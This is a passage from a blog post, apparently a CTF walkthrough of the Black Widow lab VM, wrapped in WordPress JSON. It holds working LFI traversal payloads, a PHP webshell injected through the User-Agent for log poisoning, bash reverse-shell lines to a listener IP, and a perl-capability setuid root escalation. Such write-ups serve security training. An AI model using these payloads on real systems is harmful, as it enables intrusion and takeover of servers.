  43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                              \n000000276:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/etc\/passwd&quot;                                                                                                    \n000000311:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/etc\/passwd&amp;=%3C%3C%3C%3C&quot;                                                                                \n000000400:   200        40 L     117 W      887 Ch      
&quot;\/etc\/rpc&quot;                                                                                                                  \n000000399:   200        2 L      4 W        47 Ch       &quot;\/etc\/resolv.conf&quot;                                                                                                          \n000000422:   200        121 L    394 W      3250 Ch     &quot;\/etc\/ssh\/sshd_config&quot;                                                                                                      \n000000020:   200        29 L     43 W       1582 Ch     &quot;..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&quot;                                                       \n000000504:   200        4 L      44 W       512 Ch      &quot;\/proc\/net\/route&quot;                                                                                                           \n000000506:   200        7 L      24 W       176 Ch      &quot;\/proc\/partitions&quot;                                                                                                          \n000000505:   200        8 L      131 W      1200 Ch     &quot;\/proc\/net\/tcp&quot;                                                                                                             \n000000507:   200        0 L      1 W        27 Ch       &quot;\/proc\/self\/cmdline&quot;                                                                                                        \n000000503:   200        4 L      54 W       450 Ch      &quot;\/proc\/net\/dev&quot;                                                                                                             \n000000501:   200        32 L     192 W      2251 Ch     &quot;\/proc\/mounts&quot;                                                                                                              \n000000502:   200        4 L      27 W       316 Ch      &quot;\/proc\/net\/arp&quot;                             
                                                                                \n000000500:   200        47 L     137 W      1307 Ch     &quot;\/proc\/meminfo&quot;                                                                                                             \n000000498:   200        32 L     149 W      1388 Ch     &quot;\/proc\/interrupts&quot;                                                                                                          \n000000497:   200        27 L     167 W      981 Ch      &quot;\/proc\/cpuinfo&quot;                                                                                                             \n000000499:   200        1 L      5 W        25 Ch       &quot;\/proc\/loadavg&quot;                                                                                                             \n000000509:   200        54 L     131 W      1024 Ch     &quot;\/proc\/self\/status&quot;                                                                                                         \n000000510:   200        1 L      14 W       138 Ch      &quot;\/proc\/version&quot;                                                                                                             \n000000648:   200        639 L    7668 W     123219 Ch   &quot;\/var\/log\/apache2\/access.log&quot;                                                                                               \n000000650:   200        681 L    8172 W     131149 Ch   &quot;..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&quot;                                                                           \n000000699:   200        0 L      1 W        292583 Ch   &quot;\/var\/log\/lastlog&quot;                                                                                                          \n000000750:   200        0 L      2 W        1151 Ch     &quot;\/var\/run\/utmp&quot;                                                                            
                                 \n000000741:   200        11 L     66 W       53368 Ch    &quot;\/var\/log\/wtmp&quot;                                                                                                             \n000000929:   200        29 L     43 W       1582 Ch     &quot;\/\/\/\/\/\/\/..\/..\/..\/etc\/passwd&quot;                                                                                                \n\nTotal time: 3.069660\nProcessed Requests: 929\nFiltered Requests: 863\nRequests\/sec.: 302.6393<\/code><\/pre>\n<p>Found a log file that can be included: <code>..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log<\/code>, so try to exploit it:<\/p>\n<p>When making the request, set the User-Agent header to a one-line webshell:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326604.png\" alt=\"image-20250617122001532\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\"># UA\n&lt;?=`$_GET[0]`?&gt;\nhttp:\/\/192.168.10.100\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;0=id<\/code><\/pre>\n<p>Then exploit it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326605.png\" alt=\"image-20250617122111592\" style=\"zoom:50%;\" \/><\/p>\n<p>After that it should just be a matter of popping a reverse shell, but none of the commands would execute, so try URL-encoding the command:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.100\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;0=bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E10%2E107%2F1234%200%3E%261%27\n# bash -c &#039;bash -i &gt;&amp; \/dev\/tcp\/192.168.10.107\/1234 0&gt;&amp;1&#039;<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326606.png\" alt=\"image-20250617130130751\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@blackwidow:\/var\/www\/html\/company$ sudo -l\nsudo: unable to resolve host blackwidow: Name or service not known\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \n(remote) www-data@blackwidow:\/var\/www\/html\/company$ cd \/tmp\n(remote) www-data@blackwidow:\/tmp$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/sbin\/mount.nfs\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n(remote) www-data@blackwidow:\/tmp$ getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/perl =\n\/usr\/bin\/perl5.28.1 =\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/lib\/squid\/pinger = cap_net_raw+ep<\/code><\/pre>\n<p>Tried uploading <code>linpeas.sh<\/code> and found a readable backup file:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326607.png\" alt=\"image-20250617131018424\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326608.png\" alt=\"image-20250617131159529\" style=\"zoom:33%;\" \/><\/p>\n<p>Found a password: <code>?V1p3r2020!?<\/code>. Try switching user:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326609.png\" alt=\"image-20250617131355960\" style=\"zoom:50%;\" \/><\/p>\n<h3>Privilege Escalation to root<\/h3>\n<pre><code class=\"language-bash\">viper@blackwidow:~$ ls 
-la\ntotal 40\ndrwxr-xr-x 4 viper viper 4096 May  2  2021 .\ndrwxr-xr-x 3 root  root  4096 Dec 12  2020 ..\ndrwx------ 4 viper viper 4096 Dec 13  2020 backup_site\n-rw------- 1 viper viper 1546 May  2  2021 .bash_history\n-rw-r--r-- 1 viper viper  220 Dec 12  2020 .bash_logout\n-rw-r--r-- 1 viper viper 3526 Dec 12  2020 .bashrc\ndrwxr-xr-x 3 viper viper 4096 Dec 13  2020 .local\n-rw------- 1 viper viper   33 Dec 12  2020 local.txt\n-rw-r--r-- 1 viper viper  807 Dec 12  2020 .profile\n-rw------- 1 viper viper   56 May  2  2021 .Xauthority\nviper@blackwidow:~$ cat local.txt \nd930fe79919376e6d08972dae222526b\nviper@blackwidow:~$ cd backup_site\nviper@blackwidow:~\/backup_site$ ls -la\ntotal 96\ndrwx------ 4 viper viper  4096 Dec 13  2020 .\ndrwxr-xr-x 4 viper viper  4096 May  2  2021 ..\ndrwxr-xr-x 6 viper viper  4096 Dec 13  2020 assets\n-rw-r--r-- 1 viper viper  1175 Dec 13  2020 changelog.txt\ndrwxr-xr-x 2 viper viper  4096 Dec 13  2020 forms\n-rw-r--r-- 1 viper viper 42179 Dec 13  2020 index.html\n-rw-r--r-- 1 viper viper  8429 Dec 13  2020 inner-page.html\n-rw-r--r-- 1 viper viper  9861 Dec 13  2020 portfolio-details.html\n-rw-r--r-- 1 viper viper   222 Dec 13  2020 Readme.txt\n-rw-r--r-- 1 viper viper   227 Dec 13  2020 started.php\nviper@blackwidow:~\/backup_site$ cd \/tmp\nviper@blackwidow:\/tmp$ getcap -r \/ 2&gt;\/dev\/null\n\/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic = cap_setuid+ep\n\/usr\/bin\/perl =\n\/usr\/bin\/perl5.28.1 =\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/lib\/squid\/pinger = cap_net_raw+ep<\/code><\/pre>\n<p>Found a new capability:<\/p>\n<pre><code class=\"language-bash\">viper@blackwidow:\/tmp$ \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic --help\n\nUsage: \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic [switches] [--] [programfile] [arguments]\n  -0[octal]         specify record separator (\\0, if no argument)\n  -a                autosplit mode with -n or -p (splits $_ into 
@F)\n  -C[number\/list]   enables the listed Unicode features\n  -c                check syntax only (runs BEGIN and CHECK blocks)\n  -d[:debugger]     run program under debugger\n  -D[number\/list]   set debugging flags (argument is a bit mask or alphabets)\n  -e program        one line of program (several -e&#039;s allowed, omit programfile)\n  -E program        like -e, but enables all optional features\n  -f                don&#039;t do $sitelib\/sitecustomize.pl at startup\n  -F\/pattern\/       split() pattern for -a switch (\/\/&#039;s are optional)\n  -i[extension]     edit &lt;&gt; files in place (makes backup if extension supplied)\n  -Idirectory       specify @INC\/#include directory (several -I&#039;s allowed)\n  -l[octal]         enable line ending processing, specifies line terminator\n  -[mM][-]module    execute &quot;use\/no module...&quot; before executing program\n  -n                assume &quot;while (&lt;&gt;) { ... }&quot; loop around program\n  -p                assume loop like -n but print line also, like sed\n  -s                enable rudimentary parsing for switches after programfile\n  -S                look for programfile using PATH environment variable\n  -t                enable tainting warnings\n  -T                enable tainting checks\n  -u                dump core after parsing program\n  -U                allow unsafe operations\n  -v                print version, patchlevel and license\n  -V[:variable]     print configuration summary (or a single Config.pm variable)\n  -w                enable many useful warnings\n  -W                enable all warnings\n  -x[directory]     ignore text before #!perl line (optionally cd to directory)\n  -X                disable all warnings\n\nRun &#039;perldoc perl&#039; for more help with Perl.\n\nviper@blackwidow:\/tmp$ perldoc perl\nYou need to install the perl-doc package to use this 
program.<\/code><\/pre>\n<p>It turns out this binary is <code>perl<\/code>, so try to exploit it:<\/p>\n<pre><code class=\"language-bash\">viper@blackwidow:\/tmp$ \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic -e &quot;printf &#039;test&#039;&quot;\ntest<\/code><\/pre>\n<p>Try this: <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/perl\/#capabilities\">https:\/\/gtfobins.github.io\/gtfobins\/perl\/#capabilities<\/a><\/p>\n<pre><code class=\"language-bash\">viper@blackwidow:\/tmp$ \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/bash&quot;;&#039;\nroot@blackwidow:\/tmp# whoami;id\nroot\nuid=0(root) gid=1001(viper) groups=1001(viper)<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326610.png\" alt=\"image-20250617132507310\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">root@blackwidow:~# cat .bash_history\nbash -i &gt;&amp; \/dev\/tcp\/192.168.1.111\/1234 0&gt;&amp;1\nsudo reboot\nsu\ncd \/var\/www\/html\/\nls\nnano index.html \nsu\npython\nclear\ncurl\nclear\n\/usr\/bin\/GET\nsu\nls\nsh some.file\nls -lrt \/usr\/bin\/perl\nchmod o-x \/usr\/bin\/perl\nsu\nperl -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\n.\/perl 
-e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nmv perl arsenic\nls .lrt\nls -lrt\nchmod o-x arsenic \nls -lrt\nchmod 600 arsenic \nls\nls -lrt\nchmod 650 arsenic \nls -lrt\n.\/perl -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nchmod 700 arsenic \nls -lrt\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nls -lrt\ncp \/var\/www\/html\/company\/ .\/backup_site\ncp -r \/var\/www\/html\/company\/ .\/backup_site\nls -lrt\ncd backup_site\/\nls -lrt\ncd assets\nls -lrt\ncd vendor\nls lrt\nls -lrt\nmkdir weapon\nls -lrt\nmv ..\/..\/..\/arsenic weapon\/\ncd weapon\/\nls\ncd ..\nls -lrt\nsh linpe\nsh linpeas\nclear\ncd ..\nls\ncd viper\nls\nls -lrt\nchmod 600 backup_site\/\nls -lrt\ncd viper\ncd backup_site\/\nchmod 650 backup_site\/\nls -lrt\ncd backup_site\/\nchmod 700 backup_site\/\ncd backup_site\/\ncd ..\nls -lrt\ncd backup_site\/\nls -lrt\ncd assets\nls -lrt\ncd vendor\nls -lrt\ncd weapon\/\nls\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nsu\nsh linpeas\ncp \/usr\/bin\/perl .\nls\nsudo setcap cap_setuid+ep .\/perl\nsu\nsu test\nsu\nsu root\nexit\nsu root\narsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nls\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nsu root<\/code><\/pre>\n<p>This is exactly the path the author intended!<\/p>\n<pre><code class=\"language-bash\">root@blackwidow:\/root# ls -la\ntotal 32\ndrwx------  3 root root 4096 May  2  2021 .\ndrwxr-xr-x 18 root root 4096 Dec 11  2020 ..\nlrwxrwxrwx  1 root root    9 Dec 12  2020 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Dec 12  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 
.profile\n-rw-------  1 root root   14 Dec 13  2020 .python_history\n-rw-------  1 root root  926 Apr 21  2021 root.txt\n-rw-r--r--  1 root root   66 May  2  2021 .selected_editor\nroot@blackwidow:\/root# cat root.txt \n\n\u2584\u2584\u2584\u2584\u00b7 \u2584\u2584\u258c   \u2584\u2584\u2584\u00b7  \u2584\u2584\u00b7 \u2584 \u2022\u2584     \u2584\u2584\u258c \u2590 \u2584\u258c\u25aa  \u00b7\u2584\u2584\u2584\u2584        \u2584\u2584\u258c \u2590 \u2584\u258c\n\u2590\u2588 \u2580\u2588\u25aa\u2588\u2588\u2022  \u2590\u2588 \u2580\u2588 \u2590\u2588 \u258c\u25aa\u2588\u258c\u2584\u258c\u25aa    \u2588\u2588\u00b7 \u2588\u258c\u2590\u2588\u2588\u2588 \u2588\u2588\u25aa \u2588\u2588 \u25aa     \u2588\u2588\u00b7 \u2588\u258c\u2590\u2588\n\u2590\u2588\u2580\u2580\u2588\u2584\u2588\u2588\u25aa  \u2584\u2588\u2580\u2580\u2588 \u2588\u2588 \u2584\u2584\u2590\u2580\u2580\u2584\u00b7    \u2588\u2588\u25aa\u2590\u2588\u2590\u2590\u258c\u2590\u2588\u00b7\u2590\u2588\u00b7 \u2590\u2588\u258c \u2584\u2588\u2580\u2584 \u2588\u2588\u25aa\u2590\u2588\u2590\u2590\u258c\n\u2588\u2588\u2584\u25aa\u2590\u2588\u2590\u2588\u258c\u2590\u258c\u2590\u2588 \u25aa\u2590\u258c\u2590\u2588\u2588\u2588\u258c\u2590\u2588.\u2588\u258c    \u2590\u2588\u258c\u2588\u2588\u2590\u2588\u258c\u2590\u2588\u258c\u2588\u2588. 
\u2588\u2588 \u2590\u2588\u258c.\u2590\u258c\u2590\u2588\u258c\u2588\u2588\u2590\u2588\u258c\n\u00b7\u2580\u2580\u2580\u2580 .\u2580\u2580\u2580  \u2580  \u2580 \u00b7\u2580\u2580\u2580 \u00b7\u2580  \u2580     \u2580\u2580\u2580\u2580 \u2580\u25aa\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2022  \u2580\u2588\u2584\u2580\u25aa \u2580\u2580\u2580\u2580 \u2580\u25aa\n\nCongrats!\n\nYou&#039;ve rooted Black Widow!\n\n0xJin - mindsflee\nFollow on Instagram: 0xjiin\nFollow on Twitter: 0xJin , @mindsflee\n\n0780eb289a44ba17ea499ffa6322b335\n\nroot@blackwidow:\/root# cat .python_history\nexti()\nexit()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>BlackWidow Information Gathering Port Scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-882","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/882","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=882"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/882\/revisions"}],"predecessor-version":[{"id":885,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/882\/revisions\/885"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=882"}],"wp:term":[{"taxonom
y":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=882"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}